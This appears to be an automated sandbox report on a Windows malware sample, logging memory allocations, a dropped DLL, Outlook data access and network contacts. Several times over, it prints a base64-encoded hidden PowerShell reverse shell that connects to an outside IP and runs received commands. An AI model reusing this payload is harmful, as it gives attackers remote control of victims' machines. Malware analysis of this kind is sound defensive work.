NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0213a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02113000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02114000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0214b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02147000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02145000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02115000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0213c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02116000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0214c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	c:\Users\test22\AppData\Local\Temp\77qerqcd.dll

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\Links\Desktop.lnk
file	C:\Users\test22\Links\RecentPlaces.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\Links\Downloads.lnk

Creates a suspicious process (2 events)

cmdline

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

cmdline

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\77qerqcd.dll

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 14, 2021, 3:52 p.m.	thread_identifier: 2792 thread_handle: 0x000003b4 process_identifier: 2848 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA= filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000039c	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 14, 2021, 3:52 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 14, 2021, 3:52 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\77qerqcd.cmdline"

Communicates with host for which no DNS query was performed (2 events)

host	34.123.161.169
host	34.64.143.34

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\77qerqcd.cmdline

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\Documents\Outlook 파일\Outlook.pst

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\77qerqcd.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
parent_process	powershell.exe	martian_process	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzA